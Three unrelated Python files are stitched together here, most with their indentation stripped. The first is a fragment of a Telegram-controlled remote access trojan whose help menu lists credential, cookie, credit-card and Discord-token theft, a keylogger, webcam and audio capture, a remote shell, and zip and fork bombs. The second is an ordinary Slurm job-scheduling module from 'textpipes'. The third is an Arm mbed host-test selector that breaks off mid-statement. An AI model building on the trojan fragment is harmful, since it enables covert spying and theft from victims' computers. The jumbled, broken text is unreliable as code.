@bot.message_handler(commands=['Help', 'help'])
def Help(command):
bot.send_message(command.chat.id,
'ᅠᅠᅠᅠ ⚙️ *Commands* ⚙️'
'\n'
'\n'
'\n*/Info* - _System Information_'
'\n*/Location* - _Location by BSSID_'
'\n'
'\n*/Screen* - _Desktop Capture_'
'\n*/Webcam* - _Webcam Capture_'
'\n*/Audio* - _Sound Capture_'
'\n*/Power* - _Computer Power_'
'\n*/Autorun* - _Startup Management_'
'\n'
'\n*/Files* - _Files Manager_'
'\n› */CD* - _Change Directory_'
'\n› */ls* - _List of Files_'
'\n› */Remove* - _Remove a File_'
'\n› */Upload* - _Upload File_'
'\n› */Download* - _Download File_'
'\n› */Run* - _Run File_'
'\n*/Tasklist* - _Process list_'
'\n*/Taskkill* - _Process Kill_'
'\n'
'\n*/Message* - _Send Message_'
'\n*/Speak* - _Speak Message_'
'\n*/OpenURL* - _Open URL_'
'\n*/Wallpapers* - _Set Wallpapers_'
'\n'
'\n*/WiFi* - _Wi-Fi Data_'
'\n*/FileZilla* - _FTP Client_'
'\n*/Discord* - _Discord Token_'
'\n*/Telegram* - _Telegram Session_'
'\n*/CreditCards* - _Get CreditCards_'
'\n*/Bookmarks* - _Get Bookmarks_'
'\n*/Passwords* - _Get Passwords_'
'\n*/Cookies* - _Get Cookies_'
'\n*/History* - _Get History_'
'\n'
'\n*/ZipBomb* - _Memory Overflow_'
'\n*/ForkBomb* - _Launch Programs_'
'\n'
'\n*/Clipboard* - _Clipboard Editing_'
'\n*/Keylogger* - _Receive Keylogs_'
'\n*/SendKeys* - _Send Key Press_'
'\n*/Monitor* - _Monitor Control_'
'\n*/Volume* - _Volume Control_'
'\n*/Rotate* - _Display Rotate_'
'\n*/Freeze* - _Block Input_'
'\n*/DVD* - _CD-ROM_'
'\n'
'\n*/CMD* - _Remote Shell_'
'\n*/BAT* - _Batch Scripting_'
'\n'
'\n',
#'\n*Coded by Bainky | @bainki 👾*',
reply_markup=menu, parse_mode='Markdown')
# Navigation buttons
@bot.message_handler(commands=['3', '6'])
def Main(command):
bot.send_message(command.chat.id, '`...`', reply_markup=menu, parse_mode='Markdown')
@bot.message_handler(commands=['2', '5'])
def Main(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main5, parse_mode='Markdown')
@bot.message_handler(commands=['4', '1'])
def Main(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main8, parse_mode='Markdown')
@bot.message_handler(commands=['Power', 'power'])
def Power(command):
bot.send_message(command.chat.id, '_Select an action_', reply_markup=main2, parse_mode='Markdown')
@bot.message_handler(commands=['Autorun', 'autorun'])
def Autorun(command):
bot.send_message(command.chat.id, '_Select an action_', reply_markup=main3, parse_mode='Markdown')
@bot.message_handler(commands=['Files', 'files'])
def Files(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main7, parse_mode='Markdown')
@bot.message_handler(commands=['Cancel'])
def CancelFiles(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main5, parse_mode='Markdown')
@bot.message_handler(commands=['Wallpapers', 'wallpapers'])
def Wallpapers(command):
bot.send_message(command.chat.id, '_Send photo which you would like to set on the Wallpapers_', parse_mode='Markdown')
try:
bot.polling(none_stop=True)
except:
os.startfile(CurrentPath)
sys.exit()
|
platform.py | import logging
import os
import re
import shlex
import subprocess
import sys
import threading
logger = logging.getLogger('textpipes')
MULTISPACE_RE = re.compile(r'\s+')
# built-in resource classes:
# make_immediately, default, short
# other suggestions:
# gpu, gpushort, multicore, bigmem, long
def make_override_string(overrides):
    """Serialize a {section_key: value} mapping into a CLI fragment.

    Returns '' for an empty or None mapping, otherwise a leading-space
    ' --overrides "k1=v1;k2=v2"' string with keys sorted so the output
    is deterministic.
    """
    if not overrides:
        return ''
    pairs = ['{}={}'.format(key, value)
             for (key, value) in sorted(overrides.items())]
    return ' --overrides "{}"'.format(';'.join(pairs))
def parse_override_string(override_str):
    """Inverse of make_override_string: parse 'k1=v1;k2=v2' into a dict.

    A None input yields an empty dict; values are kept as strings.
    """
    if override_str is None:
        return {}
    split_pairs = (pair.split('=') for pair in override_str.split(';'))
    return {sec_key: val for sec_key, val in split_pairs}
def passthrough_args(conf):
    """Build CLI flags that are forwarded verbatim to the sub-command.

    Currently only the --force flag is passed through.
    """
    return ' --force' if conf.force else ''
def patch_conf_string(patch_confs):
    """Render one '--patch-conf X' flag per entry, space separated.

    Returns '' when patch_confs is empty or None.
    """
    if not patch_confs:
        return ''
    flags = []
    for patch_conf in patch_confs:
        flags.append('--patch-conf {}'.format(patch_conf))
    return ' '.join(flags)
class Platform(object):
    """Base class for job-scheduling backends (local, slurm, logonly).

    Subclasses implement schedule()/check_job(); this base provides the
    shared command-line construction and resource-class lookup.
    """

    def __init__(self, name, conf):
        self.name = name    # platform name as used on the command line
        self.conf = conf    # platform section of the configuration
        # When True, scheduled jobs are executed immediately in-process.
        self.make_immediately = False

    def read_log(self, log):
        """Hook for restoring platform state from the experiment log."""
        pass

    def _cmd(self, recipe, conf, sec_key, overrides=None, patches=None):
        """Build the command line that re-invokes the recipe for one section."""
        template = ('python {recipe}.py {conf}.ini --make {sec_key}'
                    ' --platform {platform}{overrides}{pargs} {patch_str}')
        return template.format(
            recipe=recipe.name,
            conf=conf.name,
            sec_key=sec_key,
            platform=self.name,
            overrides=make_override_string(overrides),
            pargs=passthrough_args(conf),
            patch_str=patch_conf_string(patches))

    def schedule(self, recipe, conf, rule, sec_key, output_files, cli_args, deps=None, overrides=None, patches=None):
        """Submit a job; return its job id (or None if not scheduled)."""
        raise NotImplementedError()

    def post_schedule(self, job_id, recipe, conf, rule, sec_key, output_files, cli_args, deps=None, overrides=None, patches=None):
        """Hook invoked after schedule(); default is a no-op."""
        pass

    def check_job(self, job_id):
        """Return a status string for a previously scheduled job."""
        raise NotImplementedError()

    def resource_class(self, resource_class):
        """Map an abstract resource class to platform-specific scheduler args.

        Unknown classes fall back to the 'default' entry; platforms that
        define no resource classes at all yield ''.
        """
        if 'resource_classes' not in self.conf:
            return ''
        if 'resource_classes.map' in self.conf:
            # Optional aliasing layer, e.g. mapping 'big' -> 'gpu'.
            resource_class = self.conf['resource_classes.map'].get(
                resource_class, resource_class)
        known = self.conf['resource_classes']
        if resource_class in known:
            return known[resource_class]
        return known['default']

    def autolog_for_jobid(self, job_id, conf, sec_key):
        """Path of the stdout log file that the given job writes."""
        return 'slurmlogs/{}_{}_{}.stdout'.format(conf.name, sec_key, job_id)
class Local(Platform):
    """Platform that executes each job immediately in the current process."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Local jobs are not queued; run them as soon as they are scheduled.
        self.make_immediately = True

    def read_log(self, log):
        # Resume the dummy incremental job-id counter from the previous run.
        self.job_id = log.last_job_id

    def schedule(self, recipe, conf, rule, sec_key, output_files, cli_args, deps=None, overrides=None, patches=None):
        """Allocate and return the next dummy incremental job id."""
        self.job_id += 1
        return str(self.job_id)

    def post_schedule(self, job_id, recipe, conf, rule, sec_key, output_files, cli_args, deps=None, overrides=None, patches=None):
        """Run immediately, instead of scheduling."""
        run(self._cmd(recipe, conf, sec_key, overrides=overrides, patches=patches))

    def check_job(self, job_id):
        # There is no queue to query for locally executed jobs.
        return 'local'
# --gres=gpu:1 -p gpushort --mem=5000 --time=0-04:00:00
# --time=5-00:00:00 --mem=23500
# --gres=gpu:teslak80:1
# --exclude=gpu12,gpu13,gpu14,gpu15,gpu16
# -p coin --mem=30000
# Map raw slurm state strings onto textpipes' coarse job states
# (running / scheduled / done / failed). Both the truncated forms printed
# by squeue's fixed-width columns (e.g. 'COMPLETI', 'OUT_OF_ME+') and the
# full sacct forms are included.
SLURM_STATUS_MAP = {
    'RUNNING': 'running',
    'COMPLETI': 'running',
    'COMPLETING': 'running',
    'PENDING': 'scheduled',
    'COMP': 'done',
    'COMPLETED': 'done',
    'FAIL': 'failed',
    'FAILED': 'failed',
    'TIME': 'failed',
    'TIMEOUT': 'failed',
    'CANC': 'failed',
    'CANCELLED': 'failed',
    'OUT_OF_ME+': 'failed',
    'OUT_OF_MEMORY': 'failed',
}
# Extracts the numeric job id from sbatch's "Submitted batch job NNN" output.
RE_SLURM_SUBMITTED_ID = re.compile(r'Submitted batch job (\d*)')
class Slurm(Platform):
    """Slurm backend: submit jobs with sbatch, poll with squeue/sacct.

    Job status is cached per job id in self._job_status as an
    (elapsed, start, status, reason) tuple.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # job_id -> (elapsed, start, status, reason);
        # filled lazily by _parse_squeue / _parse_sacct.
        self._job_status = {}
    def schedule(self, recipe, conf, rule, sec_key, output_files, cli_args, deps=None, overrides=None, patches=None):
        """Submit the job via sbatch and return the slurm job id.

        The same command is submitted rule.chain_schedule times, each
        submission depending (afterok) on the previous one, so long work
        can be chained across scheduler time limits; the id of the last
        link is returned.
        NOTE(review): if rule.chain_schedule is 0 the loop body never runs
        and `return job_id` raises UnboundLocalError — presumably callers
        guarantee chain_schedule >= 1; confirm.
        """
        rc_args = self.resource_class(rule.resource_class)
        assert rc_args != 'make_immediately'
        cmd = self._cmd(recipe, conf, sec_key, overrides=overrides, patches=patches)
        job_name = '{}:{}'.format(conf.name, sec_key)
        # %j is expanded by slurm to the numeric job id.
        log_str = 'slurmlogs/{}_{}_%j.slurmout'.format(conf.name, sec_key)
        for i in range(rule.chain_schedule):
            if deps:
                dep_args = ' --dependency=afterok:' + ':'.join(
                    str(dep) for dep in deps)
            else:
                dep_args = ''
            # From the second chain link on, depend only on the link
            # submitted in the previous iteration.
            deps = []
            sbatch = 'sbatch --job-name {name} {rc_args}{dep_args} -o {log} --wrap="{cmd}"'.format(
                name=job_name, cmd=cmd.replace('"', r'\"'), rc_args=rc_args,
                dep_args=dep_args, log=log_str)
            r = run(sbatch)
            try:
                # sbatch prints 'Submitted batch job NNN' on success;
                # int() rejects anything that is not a clean numeric id.
                job_id = str(int(RE_SLURM_SUBMITTED_ID.match(r.std_out).group(1)))
            except Exception:
                raise Exception('Unexpected output from slurm: ' + r.describe())
            deps.append(job_id)
        return job_id
    def check_job(self, job_id):
        """Return a coarse status for job_id via SLURM_STATUS_MAP.

        Tries the cache, then squeue (pending/running jobs), then sacct
        (finished jobs); returns 'unknown' when no source knows the id.
        """
        if job_id == '-':
            return 'unknown'
        if job_id not in self._job_status:
            in_queue = self._parse_squeue(job_id)
        if job_id not in self._job_status:
            self._parse_sacct(job_id)
        if job_id in self._job_status:
            (_, _, status, _) = self._job_status[job_id]
            # sacct may append extra words (e.g. 'CANCELLED by <uid>');
            # keep only the leading state token.
            status = status.split(' ')[0]
            result = SLURM_STATUS_MAP.get(status, status)
            return result
        return 'unknown'
    def _parse_squeue(self, job_id):
        """Poll squeue for job_id; cache and return True if pending/running."""
        print('***************** running squeue!', job_id)
        # allow_fail: squeue exits nonzero for jobs it no longer knows about.
        r = run('squeue -j "{}" -hO jobid,state'.format(job_id), allow_fail=True)
        for (i, line) in enumerate(r.std_out.split('\n')):
            if len(line.strip()) == 0:
                continue
            parts = line.split()
            if len(parts) < 2:
                return False
            if parts[0] == 'slurm_load_jobs':
                # error output from squeue, not a job line
                return False
            elif parts[1] in ('PENDING', 'RUNNING'):
                status = parts[1]
                # elapsed/start are not requested from squeue; placeholders.
                self._job_status[job_id] = ('0:00', '-', status, 'squeue')
                return True
        return False
    def _parse_sacct(self, job_id):
        """Query sacct accounting for job_id and cache every returned row."""
        print('***************** running sacct!', job_id)
        r = run('sacct -j "{}" -Pno jobid,elapsed,start,state'.format(job_id))
        for (i, line) in enumerate(r.std_out.split('\n')):
            if len(line.strip()) == 0:
                continue
            parts = line.split('|')
            # FIXME not asking for reason
            #if len(parts) == 5:
            #    job_id, time, start, status, reason = parts
            #elif
            if len(parts) == 4:
                # NOTE(review): this rebinds the job_id parameter to the id
                # column of each sacct row — appears intentional so every
                # row (including job steps) is cached under its own id.
                job_id, time, start, status = parts
                reason = ''
            else:
                print('Unexpected output from sacct: ', line)
                continue
            # FIXME: non-slurm-specific namedtuple?
            self._job_status[job_id] = (time, start, status, reason)
    #def _parse_q(self):
    #    self._job_status = {}
    #    r = run('slurm q')
    #    for (i, line) in enumerate(r.std_out.split('\n')):
    #        if i == 0:
    #            continue
    #        line = line.strip()
    #        if len(line) == 0:
    #            continue
    #        fields = MULTISPACE_RE.split(line)
    #        (job_id, _, _, time, start, status) = fields[:6]
    #        reason = ' '.join(fields[6:])
    #        # FIXME: non-slurm-specific namedtuple?
    #        self._job_status[job_id] = (time, start, status, reason)
    #    r = run('slurm history')
    #    for (i, line) in enumerate(r.std_out.split('\n')):
    #        if i == 0:
    #            continue
    #        line = line.strip()
    #        if len(line) < 12:
    #            continue
    #        fields = MULTISPACE_RE.split(line)
    #        job_id = fields[0]
    #        time = fields[6]
    #        start = fields[2]
    #        status = fields[12]
    #        reason = ''
    #        # FIXME: non-slurm-specific namedtuple?
    #        self._job_status[job_id] = (time, start, status, reason)
class LogOnly(Slurm):
    """Dummy platform for testing: prints what would be submitted, runs nothing."""

    def read_log(self, log):
        # Resume the fake incremental job-id counter from the highest id
        # recorded in the experiment log (0 when the log is empty).
        self.job_id = max([0] + list(int(x) for x in log.jobs.keys()))

    def schedule(self, recipe, conf, rule, sec_key, output_files, cli_args, deps=None):
        """Print the sbatch command that would be run; return a fake job id."""
        rc_args = self.resource_class(rule.resource_class)
        # FIXME: formatting cli args
        cmd = 'python {recipe}.py {conf}.ini --make {sec_key}'.format(
            recipe=recipe.name, conf=conf.name, sec_key=sec_key)
        job_name = '{}:{}'.format(conf.name, sec_key)
        if deps:
            dep_args = ' --dependency=afterok:' + ':'.join(
                str(dep) for dep in deps)
        else:
            dep_args = ''
        print('DUMMY: sbatch --job-name {name} {rc_args}{dep_args} --wrap="{cmd}"'.format(
            name=job_name, cmd=cmd, rc_args=rc_args, dep_args=dep_args))
        # dummy incremental job_id
        self.job_id += 1
        return str(self.job_id)

    def check_job(self, job_id):
        # Bug fix: the original guarded on `self._job_status is None` and
        # called self._parse_q(), a method that exists only as commented-out
        # code in Slurm — had the branch ever fired it would have raised
        # AttributeError. Slurm.__init__ initializes _job_status to {}, so
        # the branch was dead; report a fixed status directly.
        return 'running'  # FIXME
# Registry mapping platform names (as given in the configuration)
# to their implementing classes.
classes = {
    'logonly': LogOnly,
    'local': Local,
    'slurm': Slurm,
}
class Command(object):
    """A single external command, run via Popen or a subshell.

    Commands containing shell pipe/redirection tokens are executed through
    a subshell (output is NOT captured); plain commands are tokenized with
    shlex and run via Popen with stdout/stderr captured.
    """

    def __init__(self, cmd):
        parts = shlex.split(cmd, posix=True)
        if any(x in parts for x in ('|', '>', '>>', '<')):
            # subshell args should not be split
            self.cmd = cmd
            self.subshell = True
        else:
            self.cmd = parts
            self.subshell = False
        self.process = None      # Popen handle (stays None for subshell runs)
        self.out = None          # captured stdout (None for subshell runs)
        self.err = None          # captured stderr (None for subshell runs)
        self.returncode = None   # exit status of the command
        self.data = None

    def run(self):
        """Execute the command; return (stdout, stderr), both None for subshell."""
        if self.subshell:
            self._run_shell()
        else:
            self._run_popen()
        return self.out, self.err

    def _run_shell(self):
        # Bug fix: this used subprocess.check_call, which raises
        # CalledProcessError on a nonzero exit, so self.returncode was never
        # recorded and run(..., allow_fail=True) could not tolerate failing
        # subshell commands. subprocess.call returns the exit status instead,
        # letting the caller decide how to handle failure.
        self.returncode = subprocess.call(
            self.cmd, shell=True)
        self.out, self.err = None, None

    def _run_popen(self):
        def target():
            self.process = subprocess.Popen(
                self.cmd,
                universal_newlines=True,
                shell=self.subshell,
                env=os.environ,
                stdin=subprocess.PIPE,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                bufsize=0,
            )
            # communicate() avoids the pipe-buffer deadlock that reading
            # the streams one at a time can cause.
            self.out, self.err = self.process.communicate(None)

        thread = threading.Thread(target=target)
        thread.start()
        # join() without a timeout only returns once the thread has finished,
        # so the original is_alive()/terminate() branch after it was
        # unreachable dead code and has been removed.
        thread.join()
        if self.process is None:
            raise Exception('Running failed: {}'.format(self.cmd))
        self.returncode = self.process.returncode
class Response(object):
    """A command's response: captured output, exit status, and history."""

    def __init__(self, process=None):
        super(Response, self).__init__()
        self._process = process      # the Command object that produced this
        self.command = None          # the command string/list that was run
        self.std_err = None          # captured stderr, if any
        self.std_out = None          # captured stdout, if any
        self.status_code = None      # exit status of the command
        self.history = []            # earlier responses, for chained runs

    def __repr__(self):
        return ('<Response [{0}]>'.format(self.command[0])
                if len(self.command)
                else '<Response>')

    def describe(self):
        """Human-readable dump of command, exit status, and both streams."""
        template = ('command:\n{}\nreturn code:\n{}\n'
                    'stdout:\n{}\nstderr:\n{}\n')
        return template.format(self.command, self.status_code,
                               self.std_out, self.std_err)
def run(command, allow_fail=False):
    """Execute the given command as a subprocess and return a Response.

    Uses a subshell when piping/redirection is necessary. Raises unless
    allow_fail is True when the command exits with a nonzero status.
    """
    logger.info(command)
    cmd = Command(command)
    std_out, std_err = cmd.run()
    response = Response(process=cmd)
    response.command = command
    response.std_out = std_out
    response.std_err = std_err
    response.status_code = cmd.returncode
    if not allow_fail and response.status_code != 0:
        print(response.std_err)
        raise Exception('Nonzero status code {} when running {}'.format(
            response.status_code, response.command))
    return response
|
host_test_default.py | # Copyright (c) 2018, Arm Limited and affiliates.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import sys
import traceback
from time import time
from sre_compile import error
from multiprocessing import Process, Queue
from .. import host_tests_plugins, BaseHostTest
from ..host_tests_registry import HostRegistry
# Host test supervisors
from ..host_tests.echo import EchoTest
from ..host_tests.rtc_auto import RTCTest
from ..host_tests.hello_auto import HelloTest
from ..host_tests.detect_auto import DetectPlatformTest
from ..host_tests.wait_us_auto import WaitusTest
from ..host_tests.default_auto import DefaultAuto
from ..host_tests.dev_null_auto import DevNullTest
from .host_test import DefaultTestSelectorBase
from ..host_tests_logger import HtrunLogger
from ..host_tests_conn_proxy import conn_process
from ..host_tests_toolbox.host_functional import handle_send_break_cmd
if (sys.version_info > (3, 0)):
from queue import Empty as QueueEmpty
else:
from Queue import Empty as QueueEmpty
class DefaultTestSelector(DefaultTestSelectorBase):
"""! Select default host_test supervision (replaced after auto detection) """
RESET_TYPE_SW_RST = "software_reset"
RESET_TYPE_HW_RST = "hardware_reset"
    def __init__(self, options):
        """! ctor
        @param options Parsed command-line options. Several flags trigger an
               immediate action followed by sys.exit(0): --list, --plugins,
               --version, and -b (send break). May be falsy, in which case
               only the built-in host tests are registered.
        """
        self.options = options
        self.logger = HtrunLogger('HTST')
        # Register the built-in host-test supervisors under their
        # canonical names ("default" and "default_auto" share DefaultAuto).
        self.registry = HostRegistry()
        self.registry.register_host_test("echo", EchoTest())
        self.registry.register_host_test("default", DefaultAuto())
        self.registry.register_host_test("rtc_auto", RTCTest())
        self.registry.register_host_test("hello_auto", HelloTest())
        self.registry.register_host_test("detect_auto", DetectPlatformTest())
        self.registry.register_host_test("default_auto", DefaultAuto())
        self.registry.register_host_test("wait_us_auto", WaitusTest())
        self.registry.register_host_test("dev_null_auto", DevNullTest())
        # Handle extra command from
        if options:
            if options.enum_host_tests:
                # Additionally register user-supplied host tests found on disk.
                for path in options.enum_host_tests:
                    self.registry.register_from_path(
                        path, verbose=options.verbose
                    )
            if options.list_reg_hts: # --list option
                print(self.registry.table(options.verbose))
                sys.exit(0)
            if options.list_plugins: # --plugins option
                host_tests_plugins.print_plugin_info()
                sys.exit(0)
            if options.version: # --version
                import pkg_resources # part of setuptools
                version = pkg_resources.require("mbed-host-tests")[0].version
                print(version)
                sys.exit(0)
            if options.send_break_cmd: # -b with -p PORT (and optional -r RESET_TYPE)
                handle_send_break_cmd(port=options.port,
                                      disk=options.disk,
                                      reset_type=options.forced_reset_type,
                                      baudrate=options.baud_rate,
                                      verbose=options.verbose)
                sys.exit(0)
        if options.global_resource_mgr or options.fast_model_connection:
            # If Global/Simulator Resource Mgr is working it will handle reset/flashing workflow
            # So local plugins are offline
            self.options.skip_reset = True
            self.options.skip_flashing = True
        if options.compare_log:
            # Reference log to compare DUT serial output against, line by line.
            with open(options.compare_log, "r") as f:
                self.compare_log = f.read().splitlines()
        else:
            self.compare_log = None
        self.serial_output_file = options.serial_output_file
        # Index of the next compare_log line expected to match.
        self.compare_log_idx = 0
        DefaultTestSelectorBase.__init__(self, options)
def is_host_test_obj_compatible(self, obj_instance):
"""! Check if host test object loaded is actually host test class
derived from 'mbed_os_tools.test.BaseHostTest()'
Additionaly if host test class implements custom ctor it should
call BaseHostTest().__Init__()
@param obj_instance Instance of host test derived class
@return True if obj_instance is derived from mbed_os_tools.test.BaseHostTest()
and BaseHostTest.__init__() was called, else return False
"""
result = False
if obj_instance:
result = True
self.logger.prn_inf("host test class: '%s'"% obj_instance.__class__)
# Check if host test (obj_instance) is derived from mbed_os_tools.test.BaseHostTest()
if not isinstance(obj_instance, BaseHostTest):
# In theory we should always get host test objects inheriting from BaseHostTest()
# because loader will only load those.
self.logger.prn_err("host test must inherit from mbed_os_tools.test.BaseHostTest() class")
result = False
# Check if BaseHostTest.__init__() was called when custom host test is created
if not obj_instance.base_host_test_inited():
self.logger.prn_err("custom host test __init__() must call BaseHostTest.__init__(self)")
result = False
return result
def run_test(self):
"""! This function implements key-value protocol state-machine.
Handling of all events and connector are handled here.
@return Return self.TestResults.RESULT_* enum
"""
result = None
timeout_duration = 10 # Default test case timeout
coverage_idle_timeout = 10 # Default coverage idle timeout
event_queue = Queue() # Events from DUT to host
dut_event_queue = Queue() # Events from host to DUT {k;v}
def callback__notify_prn(key, value, timestamp):
"""! Handles __norify_prn. Prints all lines in separate log line """
for line in value.splitlines():
self.logger.prn_inf(line)
callbacks = {
"__notify_prn" : callback__notify_prn
}
# if True we will allow host test to consume all events after test is finished
callbacks_consume = True
# Flag check if __exit event occurred
callbacks__exit = False
# Flag check if __exit_event_queue event occurred
callbacks__exit_event_queue = False
# Handle to dynamically loaded host test object
self.test_supervisor = None
# Version: greentea-client version from DUT
self.client_version = None
self.logger.prn_inf("starting host test process...")
# Create device info here as it may change after restart.
config = {
"digest" : "serial",
"port" : self.mbed.port,
"baudrate" : self.mbed.serial_baud,
"program_cycle_s" : self.options.program_cycle_s,
"reset_type" : self.options.forced_reset_type,
"target_id" : self.options.target_id,
"disk" : self.options.disk,
"polling_timeout" : self.options.polling_timeout,
"forced_reset_timeout" : self.options.forced_reset_timeout,
"sync_behavior" : self.options.sync_behavior,
"platform_name" : self.options.micro,
"image_path" : self.mbed.image_path,
"skip_reset": self.options.skip_reset,
"tags" : self.options.tag_filters,
"sync_timeout": self.options.sync_timeout
}
if self.options.global_resource_mgr:
grm_module, grm_host, grm_port = self.options.global_resource_mgr.split(':')
config.update({
"conn_resource" : 'grm',
"grm_module" : grm_module,
"grm_host" : grm_host,
"grm_port" : grm_port,
})
if self.options.fast_model_connection:
config.update({
"conn_resource" : 'fmc',
"fm_config" : self.options.fast_model_connection
})
def start_conn_process():
# DUT-host communication process
args = (event_queue, dut_event_queue, config)
p = Process(target=conn_process, args=args)
p.deamon = True
p.start()
return p
def process_code_coverage(key, value, timestamp):
"""! Process the found coverage key value and perform an idle
loop checking for more timeing out if there is no response from
the target within the idle timeout.
@param key The key from the first coverage event
@param value The value from the first coverage event
@param timestamp The timestamp from the first coverage event
@return The elapsed time taken by the processing of code coverage,
and the (key, value, and timestamp) of the next event
"""
original_start_time = time()
start_time = time()
# Perform callback on first event
callbacks[key](key, value, timestamp)
# Start idle timeout loop looking for other events
while (time() - start_time) < coverage_idle_timeout:
try:
(key, value, timestamp) = event_queue.get(timeout=1)
except QueueEmpty:
continue
# If coverage detected use idle loop
# Prevent breaking idle loop for __rxd_line (occurs between keys)
if key == '__coverage_start' or key == '__rxd_line':
start_time = time()
# Perform callback
callbacks[key](key, value, timestamp)
continue
elapsed_time = time() - original_start_time
return elapsed_time, (key, value, timestamp)
p = start_conn_process()
conn_process_started = False
try:
# Wait for the start event. Process start timeout does not apply in
# Global resource manager case as it may take a while for resource
# to be available.
(key, value, timestamp) = event_queue.get(
timeout=None if self.options.global_resource_mgr else self.options.process_start_timeout)
if key == '__conn_process_start':
conn_process_started = True
else:
self.logger.prn_err("First expected event was '__conn_process_start', received '%s' instead"% key)
except QueueEmpty:
self.logger.prn_err("Conn process failed to start in %f sec"% self.options.process_start_timeout)
if not conn_process_started:
p.terminate()
return self.RESULT_TIMEOUT
start_time = time()
try:
consume_preamble_events = True
while (time() - start_time) < timeout_duration:
# Handle default events like timeout, host_test_name, ...
try:
(key, value, timestamp) = event_queue.get(timeout=1)
except QueueEmpty:
continue
# Write serial output to the file if specified in options.
if self.serial_output_file:
if key == '__rxd_line':
with open(self.serial_output_file, "a") as f:
f.write("%s\n" % value)
# In this mode we only check serial output against compare log.
if self.compare_log:
if key == '__rxd_line':
if self.match_log(value):
self.logger.prn_inf("Target log matches compare log!")
result = True
break
if consume_preamble_events:
if key == '__timeout':
# Override default timeout for this event queue
start_time = time()
timeout_duration = int(value) # New timeout
self.logger.prn_inf("setting timeout to: %d sec"% int(value))
elif key == '__version':
self.client_version = value
self.logger.prn_inf("DUT greentea-client version: " + self.client_version)
elif key == '__host_test_name':
# Load dynamically requested host test
self.test_supervisor = self.registry.get_host_test(value)
# Check if host test object loaded is actually host test class
# derived from 'mbed_os_tools.test.BaseHostTest()'
# Additionaly if host test class implements custom ctor it should
# call BaseHostTest().__Init__()
if self.test_supervisor and self.is_host_test_obj_compatible(self.test_supervisor):
# Pass communication queues and setup() host test
self.test_supervisor.setup_communication(event_queue, dut_event_queue, config)
try:
# After setup() user should already register all callbacks
self.test_supervisor.setup()
except (TypeError, ValueError):
# setup() can throw in normal circumstances TypeError and ValueError
self.logger.prn_err("host test setup() failed, reason:")
self.logger.prn_inf("==== Traceback start ====")
for line in traceback.format_exc().splitlines():
print(line)
self.logger.prn_inf("==== Traceback end ====")
result = self.RESULT_ERROR
event_queue.put(('__exit_event_queue', 0, time()))
self.logger.prn_inf("host test setup() call...")
if self.test_supervisor.get_callbacks():
callbacks.update(self.test_supervisor.get_callbacks())
self.logger.prn_inf("CALLBACKs updated")
else:
self.logger.prn_wrn("no CALLBACKs specified by host test")
self.logger.prn_inf("host test detected: %s"% value)
else:
self.logger.prn_err("host test not detected: %s"% value)
result = self.RESULT_ERROR
event_queue.put(('__exit_event_queue', 0, time()))
consume_preamble_events = False
elif key == '__sync':
# This is DUT-Host Test handshake event
self.logger.prn_inf("sync KV found, uuid=%s, timestamp=%f"% (str(value), timestamp))
elif key == '__notify_sync_failed':
# This event is sent by conn_process, SYNC failed
self.logger.prn_err(value)
self.logger.prn_wrn("stopped to consume events due to %s event"% key)
callbacks_consume = False
result = self.RESULT_SYNC_FAILED
event_queue.put(('__exit_event_queue', 0, time()))
elif key == '__notify_conn_lost':
# This event is sent by conn_process, DUT connection was lost
self.logger.prn_err(value)
self.logger.prn_wrn("stopped to consume events due to %s event"% key)
callbacks_consume = False
result = self.RESULT_IO_SERIAL
event_queue.put(('__exit_event_queue', 0, time()))
elif key == '__exit_event_queue':
# This event is sent by the host test indicating no more events expected
self.logger.prn_inf("%s received"% (key))
callbacks__exit_event_queue = True
break
elif key.startswith('__'):
# Consume other system level events
pass
else:
self.logger.prn_err("orphan event in preamble phase: {{%s;%s}}, timestamp=%f"% (key, str(value), timestamp))
else:
# If coverage detected switch to idle loop
if key == '__coverage_start':
self.logger.prn_inf("starting coverage idle timeout loop...")
elapsed_time, (key, value, timestamp) = process_code_coverage(key, value, timestamp)
# Ignore the time taken by the code coverage
timeout_duration += elapsed_time
self.logger.prn_inf("exiting coverage idle timeout loop (elapsed_time: %.2f" % elapsed_time)
if key == '__notify_complete':
# This event is sent by Host Test, test result is in value
# or if value is None, value will be retrieved from HostTest.result() method
self.logger.prn_inf("%s(%s)" % (key, str(value)))
result = value
event_queue.put(('__exit_event_queue', 0, time()))
elif key == '__reset':
# This event only resets the dut, not the host test
dut_event_queue.put(('__reset', True, time()))
elif key == '__reset_dut':
# Disconnect to avoid connection lost event
dut_event_queue.put(('__host_test_finished', True, time()))
p.join()
if value == DefaultTestSelector.RESET_TYPE_SW_RST:
self.logger.prn_inf("Performing software reset.")
# Just disconnecting and re-connecting comm process will soft reset DUT
elif value == DefaultTestSelector.RESET_TYPE_HW_RST:
self.logger.prn_inf("Performing hard reset.")
# request hardware reset
self.mbed.hw_reset()
else:
self.logger.prn_err("Invalid reset type (%s). Supported types [%s]." %
(value, ", ".join([DefaultTestSelector.RESET_TYPE_HW_RST,
DefaultTestSelector.RESET_TYPE_SW_RST])))
self.logger.prn_inf("Software reset will be performed.")
# connect to the device
p = start_conn_process()
elif key == '__notify_conn_lost':
# This event is sent by conn_process, DUT connection was lost
self.logger.prn_err(value)
self.logger.prn_wrn("stopped to consume events due to %s event"% key)
callbacks_consume = False
result = self.RESULT_IO_SERIAL
event_queue.put(('__exit_event_queue', 0, time()))
elif key == '__exit':
# This event is sent by DUT, test suite exited
self.logger.prn_inf("%s(%s)"% (key, str(value)))
callbacks__exit = True
event_queue.put(('__exit_event_queue', 0, time()))
elif key == '__exit_event_queue':
# This event is sent by the host test indicating no more events expected
self.logger.prn_inf("%s received"% (key))
callbacks__exit_event_queue = True
break
elif key in callbacks:
# Handle callback
callbacks[key](key, value, timestamp)
else:
